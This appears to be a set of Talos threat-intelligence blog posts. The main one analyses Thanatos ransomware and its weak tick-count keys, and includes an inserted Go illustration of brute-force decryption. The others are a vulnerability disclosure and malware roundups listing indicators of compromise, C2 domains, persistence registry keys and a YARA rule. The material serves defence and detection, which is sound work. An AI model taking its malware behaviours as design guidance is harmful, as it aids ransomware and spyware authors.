    • www.epsycoachez.com
    Files and or directories created
    • \PC*\MAILSLOT\NET\NETLOGON
    • %AllUsersProfile%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol
    • %LocalAppData%\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol
    • %AppData%\O247ST8-
    • %AppData%\O247ST8-\O24log.ini
    • %AppData%\O247ST8-\O24logim.jpeg
    • %AppData%\O247ST8-\O24logrv.ini
    • %ProgramFiles% (x86)\L0xbx
    • %ProgramFiles% (x86)\L0xbx\winztqlgh18.exe
    • %LocalAppData%\Temp\L0xbx
    • %LocalAppData%\Temp\L0xbx\winztqlgh18.exe
    • \TEMP\tmptxf6QC.exe
    File Hashes
    • 4145362d249b81cd7f7caca054693ef5621a1f820101b4bff27009c896157e75
    • 5270a58badc5af1c4eb47e8100958699dcb4ef137670da52e24d23f1d687caac
    • 5dda41fb0abc6528d80995aedb47c0b59fc6467e7307bbdc75d097aef50fcd21
    • 71f19b06d95ec1e2947c012008bda50e23fca9a8707ccef53f2b3d4c496d179e
    • 7985460fa754edcbc2e3aa499d0dacf771a60d8a2c53e05113faeccae1496542
    • a28fabc26c7bf6da4e8a7ae712c89fa173de94787aa612a245a1452a8fb4d497
    • c2d7be6d4ab0d11a3cae4872db6fd104f1cdfcf6516e3b3548297e3b86795bf9
    • da56e0abc288d01462844de42eeac4c7a14f76f09028ffb2d55909beace24504
    • eafe26e115ca9bf982d3b579f7970e3ffa4307b9e9ab5794dd14f192941360c6
    • ed5478099263686e19bf1fc7f5c169f84afb05ecc44008e3056d913e20edc6a6

    Coverage

    Screenshots of Detection

    AMP

    ThreatGrid

    Files Cannot Be Decrypted? Challenge Accepted. Talos Releases ThanatosDecryptor

    This blog post was authored by Edmund Brumaghin, Earl Carter and Andrew Williams.

    Executive summary


    Cisco Talos has analyzed Thanatos, a ransomware variant that has been distributed via multiple malware campaigns over the past few months. As a result of our research, we have released a new, free decryption tool to help victims recover from this malware. Attackers have leveraged multiple versions of Thanatos, indicating that this is an evolving threat that continues to be actively developed by threat actors, with multiple versions distributed in the wild. Unlike other commonly distributed ransomware, Thanatos does not demand that ransom payments be made in a single cryptocurrency such as bitcoin. Instead, it has been observed supporting ransom payments in the form of Bitcoin Cash (BCH), Zcash (ZEC), Ethereum (ETH) and others.

    Additionally, due to issues present within the encryption process leveraged by this ransomware, the malware authors are unable to return the data to the victim, even if he or she pays the ransom. While previous reports seem to indicate this is accidental, specific campaigns appear to demonstrate that in some cases, this is intentional on the part of the distributor. In response to this threat, Talos is releasing ThanatosDecryptor, a free decryption tool that exploits weaknesses in the design of the file encryption methodology used by Thanatos. This utility can be used by victims to regain access to their data if infected by this ransomware.

    Technical details

    Ongoing evolution of Thanatos


    While tracking and analyzing the various campaigns being used to distribute the Thanatos ransomware, Talos identified multiple distinct versions of this malware, indicating that it is continuing to be actively developed by the malware author. The main differences can be directly observed within the ransom note being used to inform victims that they have been infected and provide instructions for paying a ransom to the attacker. Version 1 of Thanatos, which was being distributed in mid-February of this year, featured a very primitive ransom note that is stored on the victim's desktop as README.txt.
    In this version of Thanatos, the ransom note simply informs the user that their files have been encrypted and instructs them to pay a ransom of 0.01 bitcoin (BTC) to the specified bitcoin wallet. Rather than using different wallet addresses across samples, the same hardcoded wallet address is present in all samples of this version of Thanatos that Talos analyzed. Payment processing appears to be manual and email-based, which is indicative of an attacker with limited resources and limited knowledge of the ransomware creation and distribution techniques used by better-known ransomware families such as Locky and Cerber.

    Shortly after Version 1 was observed being distributed, malware distribution campaigns began distributing Thanatos Version 1.1 with the majority of the distribution of Version 1.1 occurring between February and April 2018. This updated version of Thanatos featured several key differences related to the type of cryptocurrencies that victims could pay with.
    As can be seen in the screenshot of the ransom note above, Thanatos Version 1.1 supports payment of the ransom demand using BTC, ETH, and BCH. Additionally, the malware also now includes a unique MachineID that the victim is instructed to send to the attacker via email.

    Interestingly, the ransom notes changed several times across samples that Talos analyzed. Below is another example of one of the ransom notes used by this malware. Note that the attacker had changed the email address being used to communicate with victims. The attacker was also purporting to process ransom payments in the form of Zcash versus the other cryptocurrencies listed in the other ransom notes.
    In investigating the distribution mechanisms being used by the attacker to infect victims and remove their ability to access data on their system, we identified an interesting campaign that indicated that at least in this particular case, the attacker had no intention of providing any sort of data decryption to the victim. The malware appears to have been delivered to the victim as an attachment to a chat message sent to the victim using the Discord chat platform. Discord is a voice and text chatting platform that allows direct communications between two or more participants. The URL hosting the attached malware is below:

    hxxps://cdn[.]discordapp[.]com/attachments/230687913581477889/424941165339475968/fastleafdecay.exe

    The filename used in this case was "fastleafdecay.exe" which may indicate that the victim was tricked into executing the malware as it was posing as a mod of the same name in the video game Minecraft. When executed, this sample displayed the following ransom note to victims:
    As can be seen in the above screenshot, the malware author did not include any instructions for paying a ransom and instead stated that decryption was not available. This indicates that this particular case was not financially motivated and that the malware was instead used to destroy data on the victim's system. Interestingly, the PDB path left intact in this sample differed from that of the other samples Talos analyzed. In this case, the PDB path was:

            C:\Users\Artur\Desktop\csharp - js\косте пизда\Release\Thanatos.pdb

    Most of the other samples contained the following PDB path:

            D:\Work\Thanatos\Release\Thanatos.pdb

    Talos also observed a sample that had been compiled in debug mode that contained the following PDB path:

            D:\Работа\Локер шифровчик\Thanatos-master\Debug\Thanatos.pdb

    Thanatos operations and encryption process


    When executed on victim systems, Thanatos copies itself into a subdirectory that it creates within %APPDATA%/Roaming. The subdirectory name and executable file name are randomly generated based on system uptime and changes each time the malware executes.

    Thanatos recursively scans the following directories within the current user's profile to identify files to encrypt:

            Desktop
            Documents
            Downloads
            Favourites
            Music
            OneDrive
            Pictures
            Videos

    While many ransomware families have a specific list of file extensions that are supported for encryption, Thanatos supports encryption of any file that has an extension. For each file that the malware locates, it derives an encryption key based on the number of milliseconds that the infected system has been running via a call to GetTickCount. The malware then encrypts the file using Advanced Encryption Standard (AES)-256 and discards the encryption key. The process of discarding the encryption key precludes the attacker from being able to provide access to the decrypted data, even if a ransom demand is paid. Encrypted files are then written to the filesystem with the .THANATOS file extension and the original files are deleted.

    The malware also leverages an external website called iplogger. This website provides customized URLs that can be used to track information about systems that access the URL. By making HTTP GET requests using these hardcoded URLs, the attacker can obtain information about all of the different systems that have been infected with Thanatos.
    The HTTP GET requests are all made using the following user agent:

            Mozilla/5.0 (Windows NT 6.1) Thanatos/1.1
    Talos has observed the following iplogger URLs hardcoded into various Thanatos samples that were analyzed:

            hxxp://iplogger[.]com:80/1CUTM6

            hxxp://iplogger[.]com:80/1t3i37

    The ransom note associated with Thanatos is saved to the infected user's desktop using the filename README.txt. A registry entry is created so that each time the system boots, the ransom note is displayed using the Notepad application. This registry key is located in:

            HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    Aside from this, the malware does not obtain persistence for the executable itself.

    ThanatosDecryptor


    As previously described, the encryption keys used to encrypt files on victims' systems are derived based upon the number of milliseconds since the system last booted. This value is a 32-bit number, meaning that the encryption key is effectively 32 bits as well. Additionally, the maximum number of milliseconds that can be stored in a 32-bit value is roughly 49.7 days' worth, which is higher than the average amount of uptime on many systems due to patch installation, system reboots, and other factors. This makes brute-forcing the key values significantly cheaper from a time perspective.

    Another optimization can be made based on the fact that the system uptime is written to the Windows Event Log roughly once per day. Since Thanatos does not modify the file creation dates on encrypted files, the key search space can be further reduced to approximately the number of milliseconds within the 24-hour period leading up to the infection. At an average of 100,000 brute-force attempts per second (which was the baseline in a virtual machine used for testing), it would take roughly 14 minutes to successfully recover the encryption key in these conditions.

    Talos is releasing a decryption utility that can be leveraged by victims of Thanatos to attempt to regain access to data and files stored on the infected system. It has been tested on Versions 1 and 1.1 of the Thanatos ransomware and on all currently known Thanatos samples Talos has observed.

    Note: In order to decrypt files as quickly as possible, ThanatosDecryptor should be executed on the original machine that was infected and against the original encrypted files that the malware created.

    This decryption utility currently supports decryption of the following types of files:

    Image: .gif, .tif, .tiff, .jpg, .jpeg, .png
    Video: .mpg, .mpeg, .mp4, .avi
    Audio: .wav
    Document: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .odt, .ods, .odp, .rtf
    Other: .zip, .7z, .vmdk, .psd, .lnk

    The decryptor first searches the same directories as the ransomware to identify files that contain the .THANATOS file extension. For files that contain the .THANATOS file extension, the decryptor will then obtain the original file extension, which is left intact during infection, and compare it to the list of supported file types. If the file type is supported, the decryptor will then queue that file for decryption.

    ThanatosDecryptor also parses the Windows Event Log for uptime messages and uses the encrypted file's creation time metadata to determine a starting value for decryption. This value is used to derive an encryption key, and an AES decryption operation is performed against the file contents. The resulting bytes are then compared against values known to be valid file headers for the specific file type. If they do not match, meaning the decryption attempt was unsuccessful, the seed value for the encryption key is incremented and the process is repeated. Once successful, the original file is written to the file system and the original filename is restored. Once one file has been successfully decrypted, ThanatosDecryptor uses the seed value from that decryption as the starting point for decryption attempts against additional files, since files encrypted during the same infection are likely to have very close seed values.
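    The following Go program is an added illustration of the recovery approach described above; it is not Talos's ThanatosDecryptor and not the malware's code. It shows why a key seeded from a 32-bit tick count is recoverable: the search walks candidate tick values forward from an estimated uptime, decrypts only the first AES block of the file, and accepts a candidate when the result begins with the expected file header, then checks the search-window arithmetic from the post. Two details the post does not state are assumptions made here: the key is taken to be SHA-256 of the little-endian tick value, and the cipher mode is taken to be AES-CTR with a zero IV. The magic-byte table, the sample file and the tick value are constructed for the example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// Expected leading bytes ("magic") for a few of the file types the post lists.
// Constructed subset for this example, not the decryptor's own table.
var magics = map[string][]byte{
	"png": {0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A},
	"gif": []byte("GIF8"),
	"pdf": []byte("%PDF"),
	"zip": {0x50, 0x4B, 0x03, 0x04},
}

// deriveKey turns a 32-bit tick count into a 256-bit AES key. The post says the
// key comes from GetTickCount but not how, so hashing the value is an
// ASSUMPTION for this example; what matters is that only 2^32 keys exist.
func deriveKey(tick uint32) []byte {
	var seed [4]byte
	binary.LittleEndian.PutUint32(seed[:], tick)
	sum := sha256.Sum256(seed[:])
	return sum[:]
}

// aesCTR applies AES-256 in CTR mode with a fixed zero IV (also an assumption;
// the mode Thanatos uses is not stated). CTR is its own inverse, so the same
// function encrypts and decrypts.
func aesCTR(key, data []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err) // key is always 32 bytes here
	}
	iv := make([]byte, aes.BlockSize)
	out := make([]byte, len(data))
	cipher.NewCTR(block, iv).XORKeyStream(out, data)
	return out
}

// simulateInfection produces sample ciphertext for a file encrypted while the
// machine's uptime was `tick` milliseconds. It only gives the search below
// something to work on; nothing touches the filesystem.
func simulateInfection(tick uint32, plain []byte) []byte {
	return aesCTR(deriveKey(tick), plain)
}

// recoverTick walks the tick counter forward from `start`, trying at most
// `limit` candidates. Only the first block is decrypted per attempt and the
// result is compared with the magic bytes for `ext`: the cheap check that
// lets a decryptor reject wrong keys without decrypting whole files.
func recoverTick(enc []byte, ext string, start, limit uint32) (uint32, error) {
	magic, ok := magics[ext]
	if !ok {
		return 0, fmt.Errorf("unsupported file type %q", ext)
	}
	if len(enc) < aes.BlockSize {
		return 0, errors.New("ciphertext shorter than one AES block")
	}
	for i := uint32(0); i < limit; i++ {
		tick := start + i // uint32 wrap-around mirrors GetTickCount itself
		head := aesCTR(deriveKey(tick), enc[:aes.BlockSize])
		if bytes.HasPrefix(head, magic) {
			return tick, nil
		}
	}
	return 0, errors.New("no candidate in the window reproduced the file header")
}

// worstCaseSeconds is the search-window arithmetic from the post: candidate
// keys in the window divided by attempts per second.
func worstCaseSeconds(windowMs, attemptsPerSec uint64) float64 {
	return float64(windowMs) / float64(attemptsPerSec)
}

func main() {
	// Constructed sample: a PNG header plus filler, encrypted at an uptime of
	// 2h 0m 0.123s (tick 7,200,123).
	plain := append(append([]byte{}, magics["png"]...), bytes.Repeat([]byte{0x42}, 48)...)
	const infectionTick = 7_200_123
	enc := simulateInfection(infectionTick, plain)

	// Suppose the event log places the last boot about two hours before the
	// encrypted file's creation time: start the search there.
	tick, err := recoverTick(enc, "png", 7_200_000, 1_000_000)
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered tick %d, full plaintext matches: %v\n",
		tick, bytes.Equal(aesCTR(deriveKey(tick), enc), plain))

	// The two key-space figures from the post at 100,000 attempts per second:
	// a 24-hour window versus the whole 32-bit counter.
	day := worstCaseSeconds(86_400_000, 100_000)
	full := worstCaseSeconds(1<<32, 100_000)
	fmt.Printf("24h window:   %.0f s (%.1f min)\n", day, day/60)
	fmt.Printf("full 32 bits: %.0f s (%.1f h)\n", full, full/3600)
}
```

    The 24-hour window works out to 864 seconds, the "roughly 14 minutes" the post cites, while the whole 32-bit counter at the same rate takes about 12 hours; both are trivially cheap compared with a 256-bit key chosen at random, which is the design weakness the decryptor relies on.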

    To execute ThanatosDecryptor, simply download the ThanatosDecryptor project here and execute ThanatosDecryptor.exe, which can be found in the release directory. Additional information and example output can be obtained here.

    Following the money … or lack thereof


    As previously mentioned, throughout the various Thanatos campaigns and associated samples, the attacker behind this threat made changes to the types of cryptocurrencies that they claim are supported for paying the ransom demand. Analysis of these various wallets and associated cryptocurrency transactions revealed some interesting information about the size and success of these malware campaigns over time. Across all of the samples, the following cryptocurrency wallets were listed along with instructions for paying the ransom on the ransom note accompanying the malware.

    Bitcoin ($BTC):
    1HVEZ1jZ7BWgBYPxqCVWtKja3a9hsNa9Eh
    1DRAsxW4cKAD1BCS9m2dutduHi3FKqQnZF

    Ethereum ($ETH):
    0x92420e4D96E5A2EbC617f1225E92cA82E24B03ef

    Bitcoin Cash ($BCH):
    Qzuexhcqmkzcdazq6jjk69hkhgnme25c35s9tamz6f

    ZCash ($ZEC):
    t1JBenujX2WsYEZnzxSJDsQBzDquMCf8kbZ

    In analyzing the bitcoin wallets, we identified that the attacker had not received a single ransom payment from victims. In fact, the wallet listed most frequently across the samples analyzed (1HVEZ1jZ7BWgBYPxqCVWtKja3a9hsNa9Eh) was not even a valid bitcoin wallet. This means that even if a victim tried to pay using bitcoin, they would have been unable to. The second wallet (1DRAsxW4cKAD1BCS9m2dutduHi3FKqQnZF) did not have a single transaction to or from it.
    Likewise, the Bitcoin Cash wallet that was listed has also never seen a single transaction.
    When analyzing the Zcash wallet that was seen listed on one of the ransom notes associated with Thanatos, we identified that while it had seen several transactions, the total amount of ZEC received by this wallet was 2.24767084, which equals approximately $450 USD.
    Finally, the Ethereum wallet used by the attacker also saw several transactions. However, the total amount was also low compared to some of the more successful ransomware campaigns we regularly observe across the threat landscape. The total amount of ETH received in this wallet was 0.52087597, which equals approximately $270 USD.
    This means that across all of the samples seen in the wild, the attacker's wallets had only received a total of $720 USD. If the incoming cryptocurrency was directly related to victims paying a ransom as a result of Thanatos infections, this clearly did not generate significant revenue for the attacker when compared to other financially motivated cybercrime operations.

    Conclusion


    Whether for monetary gain or to destroy data, attackers are continuously targeting end users. This malware shows how easy it has become for anyone to target users: you do not have to be a sophisticated attacker to cause havoc. There is also an endless supply of attack vectors available; in this case, for instance, the attacker took advantage of the Discord chat platform. It is therefore important to take security seriously and take steps to secure your systems, whether they are used for personal or business purposes. Since many of these attacks take advantage of users, you also need to be careful when opening attachments from unknown sources or clicking on unknown links.

    Coverage


    Additional ways our customers can detect and block this threat are listed below.
    Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

    Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

    Email Security can block malicious emails sent by threat actors as part of their campaign.

    Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

    AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

    Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

    Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

    YARA Signatures


    Talos is also providing the following YARA signature that can be used to identify samples associated with the Thanatos ransomware family.

    rule Thanatos
    {
        strings:
            $s1 = ".THANATOS\x00" ascii
            $s2 = "\\Desktop\\README.txt" ascii
            $s3 = "C:\\Windows\\System32\\notepad.exe C:\\Users\\" ascii
            $s4 = "AppData\\Roaming" ascii
            $s5 = "\\Desktop\x00" ascii
            $s6 = "\\Favourites\x00" ascii
            $s7 = "\\OneDrive\x00" ascii
            $s8 = "\\x00.exe\x00" ascii
            $s9 = "/c taskkill /im" ascii
            $s10 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii

        condition:
            6 of ($s1, $s2, $s3, $s4, $s5, $s6, $s7, $s8, $s9, $s10)
    }


    Indicators of Compromise (IOC)


    File Hashes (SHA256)


    bad7b8d2086ac934c01d3d59af4d70450b0c08a24bc384ec61f40e25b7fbfeb5
    fe1eafb8e31a84c14ad5638d5fd15ab18505efe4f1becaa36eb0c1d75cd1d5a9
    8df0cb230eeb16ffa70c984ece6b7445a5e2287a55d24e72796e63d96fc5d401
    97d4145285c80d757229228d13897820d0dc79ab7aa3624f40310098c167ae7e
    55aa55229ea26121048b8c5f63a8b6921f134d425fba1eabd754281ca6466b70
    02b9e3f24c84fdb8ab67985400056e436b18e5f946549ef534a364dff4a84085
    241f67ece26c9e6047bb1a9fc60bf7c45a23ea1a2bb08a1617a385c71d008d79
    0bea985f6c0876f1c3f9967d96abd2a6c739de910e7d7025ae271981e9493204
    42748e1504f668977c0a0b6ac285b9f2935334c0400d0a1df91673c8e3761312

    URLs


    hXXps://cdn[.]discordapp[.]com/attachments/230687913581477889/424941165339475968/fastleafdecay.exe
    hXXp://iplogger[.]com:80/1CUTM6
    hXXp://iplogger[.]com:80/1t3i37

    User Agents


    Mozilla/5.0 (Windows NT 6.1) Thanatos/1.1

    Beers with Talos EP 32 - Live from Orlando Part 2: Take All the Things Off the Internet



    Beers with Talos (BWT) Podcast Episode 32 is now available. Download this episode and subscribe to Beers with Talos:

    If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast.

    Ep. 32 show notes: 

    Recorded June 13, 2018 — Still live in Orlando, just this time from the lovely lobby bar at the convention center hotel. We are joined by Lurene Grenier to dig a bit deeper on her keynote from the Talos Threat Research Summit. Lurene is here to give you the offensive view of attacking your network. If you want a hot take on defense from someone who is pure offense, well… buckle up and break out your cord-cutting scissors. You are already saying “We can’t do that!” Lurene is telling you that if you decide to take this seriously enough, you can and should.

    The timeline:

    The roundtable

    01:10 — Nigel: Reduced to looking forward to Liverpool’s schedule release day
    02:18 — Joel: Already checked out and is mentally at Harry Potter World
    03:12 — Craig: Not paying attention
    03:47 — Matt: Meet Lurene
    05:16 — Lurene: No free keynotes, and how to play the “don’t call the police” game

    The topics

    10:27 — Honestly, we are here for one purpose and topic today: Lurene’s defensive mantra, which she calls "Take Your S***t off the Internet." This is where we spend the whole show. If you are interesting to a major actor and you are taking things seriously, the only truly safe play is taking all your pieces off the board. If you don’t, someone else will.

    The links

    No links. Weren’t you listening?

    ==========

    Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC). Special Guest Nick Biasini (@infosec_nick).
    Hosted by Mitch Neff (@MitchNeff).

    Find all episodes:
    http://cs.co/talospodcast

    Subscribe via iTunes (and leave a review!)
    http://cs.co/talositunes

    Check out the Talos Threat Research Blog:
    http://cs.co/talosresearch

    Subscribe to the Threat Source newsletter:
    http://cs.co/talosupdate

    Follow Talos on Twitter:
    http://cs.co/talostwitter

    Give us your feedback and suggestions for topics:
    beerswithtalos@cisco.com

    Vulnerability Spotlight: VMWare Workstation DoS Vulnerability

    Today, Talos is disclosing a vulnerability in VMware Workstation that could result in a denial of service. VMware Workstation is a widely used virtualization platform designed to run alongside a normal operating system, allowing users to use both virtualized and physical systems concurrently.

    TALOS-2018-0540

    Discovered by a member of Cisco Talos

    TALOS-2018-0540 / CVE-2018-6965 is an exploitable denial-of-service (DoS) vulnerability in VMware Workstation 14. The vulnerability lies in the pixel shader used by VMware Workstation and can be triggered by supplying a malformed pixel shader, in either text or binary form, from inside a VMware guest operating system. The vulnerability can be triggered from a VMware guest or a VMware host and results in a process crash, leading to a DoS condition.

    For more technical details, please read our advisory here.

    Tested Software:

    VMware Workstation 14 (14.1.1.28517)

    Coverage

    Talos has developed the following Snort rules to detect attempts to exploit this vulnerability. Note that these rules are subject to change pending additional vulnerability information. For the most current information, please visit your Firepower Management Center or Snort.org.

    Snort Rules: 45981-45982

    For other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal: http://www.talosintelligence.com/vulnerability-reports/

    To review our Vulnerability Disclosure Policy, please visit this site:

    Threat Roundup for June 22-29



    Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 22 and June 29. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

    As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

    The most prevalent threats highlighted in this roundup are:

    • Win.Trojan.Remcos-6591502-0
      Trojan
      Remcos is a commercial RAT, but a version with fewer features is also available for free. It can be configured to perform anti-VM checks and hinder analysis. This family is able to receive and execute commands from a C&C server; the commands may activate and record the microphone and camera, as well as enable keylogger functionality. Remcos is spread through aggressive spam campaigns and by leveraging Word/Excel macros.
       
    • Win.Malware.Separ-6591487-0
      Malware
      This family is spyware delivered via spam campaigns. The malware survives reboots and is able to collect confidential information by capturing login attempts. It disables the Windows firewall, invokes scripts, and has FTP functionality to upload the collected data.
       
    • Win.Malware.Tspy-6591475-0
      Malware
      The Tspy family is malware with several functionalities. It executes itself after every reboot and is therefore persistent. It contacts domains that are related to RATs and are generally C&C servers in order to upload data and receive additional commands. The samples are often packed and contain anti-debug tricks to complicate manual analysis.
       
    • Win.Malware.Jaik-6591471-0
      Malware
      Jaik is a botnet with several functionalities. The samples are able to communicate with domains and perform code injection into other processes. The malware has many features, and some samples also have DDoS capabilities as well as generic credential harvesting.
       
    • Win.Malware.Delf-6591417-0
      Malware
      This family is generic malware and is generally the first step of a deeper infection. Once executed on the machine, the payload downloads and runs new binaries. The malware is interested in credentials and focuses its attention on well-known applications such as Outlook, Thunderbird, and Firefox.
       
    • Win.Malware.Ursu-6591377-0
      Malware
      Ursu is generic malware with many functionalities. It contacts a C&C server and performs code injection into the address space of legitimate processes. It is able to achieve persistence as well as collect confidential data. It is spread by email.
       

    Threats

    Win.Trojan.Remcos-6591502-0


    Indicators of Compromise


    Registry Keys
    • N/A
    Mutexes
    • N/A
    IP Addresses
    • N/A
    Domain Names
    • N/A
    Files and or directories created
    • %WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
    • %System32%\winevt\Logs\Windows PowerShell.evtx
    File Hashes
    • 0007bb868ae54ff5be81cf04d7ff4c38c1d36ee18fbc3ee166d1f6298b8e4176
    • 00171a400fb86b6f6489875fdf65079b765255e2240c30f174b1f9aff6a17dac
    • 04bb108e21aaa1b3832e2ff483237559c02dda2ddfc03e2b56e7bc818614d0e4
    • 074dcfd66274bec7d3ac3e23fd77d21baca17efa497eb94d748e46add97e8c27
    • 07b31ec3eabb4967f7ed54d437de2d4a3e9271810f4f9c2b238bb6ba7829f180
    • 0913592e52b43087d0f2a23700e5c625c0cdd4d391354233dc692a5477416ca9
    • 094e5d7bce863dcf7652873c15d18dfce918eca631c471bbe59f739fccb770c8
    • 09a7a2aeb1af80aa666c5920765e4409e367a051c161d948f1a193adbe5040a3
    • 0e953857e78b91fa30011d345fccf6f86a8697318935b227d69ac4dd4915889b
    • 10173267784ffb1934d59ce8bd822f9f9260bbc7420eeafd0c8affa8a62e840b
    • 1323533b1caa1537b50c0ddb43b5f692901d2bb3b38f11e0fb380d72149ef53d
    • 13aeccc984e1570bf36d8440df9b293277b25f26bb299179d187ac47b3500488
    • 13fbdc096406f0f975d02a160448d98fd9d49d3ce7d338151668001017dbe397
    • 144b7841ed6f8181b99e6be48533a77db7ec1183cd3700fecda0cfdc4b5bf3bb
    • 1623edf8271a3a77d74658adcf67d5f99f6102bf178c0665dd68bc932b0c1228
    • 192f60438d4707d0edb60c2ab1b69df72943b7812bd77bb393182db0636be982
    • 1a6c169c82fd99a1b607100c42cae0c39f964ea2dbe6e0216479171d479275df
    • 297ce1753eb30ecc82b016aac7ab694eb0bd4ded06fdecc5cd42a2464e4831db
    • 2a0d2df8c466bbe5bf538e9745286f124f3ca426d3ece80fbb675863281c46a5
    • 2a4a9722a20800038438c88d240083b65c729004d30e0c993f67202541f60811
    • 2a67165161c7cbeed1fb43aa27b770b627b0eabe7a647387382fa4cff0acbaa3
    • 2bbed3835b0efc4efe05d8fc806ab9fa5313202d566d18060542d23a3cb80fed
    • 2d834a721aa72e59378d795f16b179e6cc8fc0040441d72b293f19d863cd22ad
    • 318d9318e4e204f378f8ffeb7d831a6f251d6ca4e827f8e48449be0812e2cb25
    • 31aa91dfa01203239b8aa25649c05a084e62de8814e101c24f3fbd5f2d234014

    Coverage

    Screenshots of Detection

    AMP

    ThreatGrid


    Win.Malware.Separ-6591487-0


    Indicators of Compromise


    Registry Keys
    • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
    • <HKLM>\System\CurrentControlSet\Services\NapAgent\LocalConfig
    • <HKLM>\System\CurrentControlSet\Control\DeviceClasses
    • <HKLM>\Software\Wow6432Node\Microsoft\Windows Script Host\Settings
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\EVENTLOG\APPLICATION\CHROME
      • Value Name: CategoryCount
    Mutexes
    • RasPbFile
    • DILLOOEP
    • DILLOCREATE
    • RAL716BCAD1
    • Global\GS-1-5-21-2580483871-590521980-3826313501-500{D19BAF17-7C87-467E-8D63-6C4B1C836373}
    • Global\G{D19BAF17-7C87-467E-8D63-6C4B1C836373}
    IP Addresses
    • 198.23.57.8
    Domain Names
    • ftp.freehostia.com
    Files and or directories created
    • ZREA.vbs
    • \wkssvc
    • BReader.exe
    • aijw01.bat
    • Adobeta.exe
    • adip2.klc
    • adbr02.ght
    • adbr01.ght
    • 870.afr
    • %WinDir%\TEMP\gui9381.tmp
    • %WinDir%\Temp\gui9381.tmp
    • %WinDir%\TEMP\Crashpad\settings.dat
    • %WinDir%\TEMP\Crashpad\reports
    • %WinDir%\TEMP\Crashpad\metadata
    • PSTools\PsExec.exe
    • \scripts\PSTools\PsExec.exe
    • sendemail\sendEmail.exe
    • sendemail\sendEmail.pl
    File Hashes

    Coverage


    Screenshots of Detection

    AMP


    ThreatGrid




    Umbrella



    Win.Malware.Tspy-6591475-0


    Indicators of Compromise


    Registry Keys
    • <HKLM>\SOFTWARE\MICROSOFT\RAS AUTODIAL\Default
    Mutexes
    • 3749282D282E1E80C56CAE5A
    IP Addresses
    • 207.174.215.154
    Domain Names
    • azmiry.com
    Files and or directories created
    • \samr
    • %WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
    • \lsass
    • %AppData%\D282E1\1E80C5.lck
    File Hashes

    Coverage


    Screenshots of Detection

    AMP


    ThreatGrid




    Umbrella




    Win.Malware.Jaik-6591471-0


    Indicators of Compromise


    Registry Keys
    • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
    Mutexes
    • N/A
    IP Addresses
    • N/A
    Domain Names
    • meteor1174.hopto.org
    Files and or directories created
    • N/A
    File Hashes

    Coverage


    Screenshots of Detection

    AMP


    ThreatGrid




    Umbrella




    Win.Malware.Delf-6591417-0


    Indicators of Compromise


    Registry Keys
    • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
    • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
    • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
    • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion
    • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
    • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
    • <HKCU>\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\
    • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\20.0.1 (en-US)\Main
    • <HKCU>\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook_2016\
    Mutexes
    • S-1-5-21-2580483-2483680211483
    • 8-3503835SZBFHHZ
    • O40QO-SR7BC0x74z
    IP Addresses
    Domain Names
    Files and or directories created
    • \TEMP\tmp8gR_uW.exe
    • %ProgramFiles% (x86)\Nldp\colorcpl8pjxn.exe
    • %AppData%\O40QO-SR\O40logrv.ini
    • %LocalAppData%\Temp\Nldp\colorcpl8pjxn.exe
    File Hashes

    Coverage


    Screenshots of Detection

    AMP


    ThreatGrid




    Umbrella




    Win.Malware.Ursu-6591377-0


    Indicators of Compromise


    Registry Keys
    • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
    • <HKLM>\System\CurrentControlSet\Control\DeviceClasses
    • <HKLM>\Software\Microsoft\RAS AutoDial
    Mutexes
    • 3749282D282E1E80C56CAE5A
    IP Addresses
    • 104.27.133.70
    Domain Names
    • saferfreedom.tk
    Files and or directories created
    • %AppData%\D282E1\1E80C5.lck
    File Hashes

    Coverage


    Screenshots of Detection

    AMP


    ThreatGrid




    Umbrella



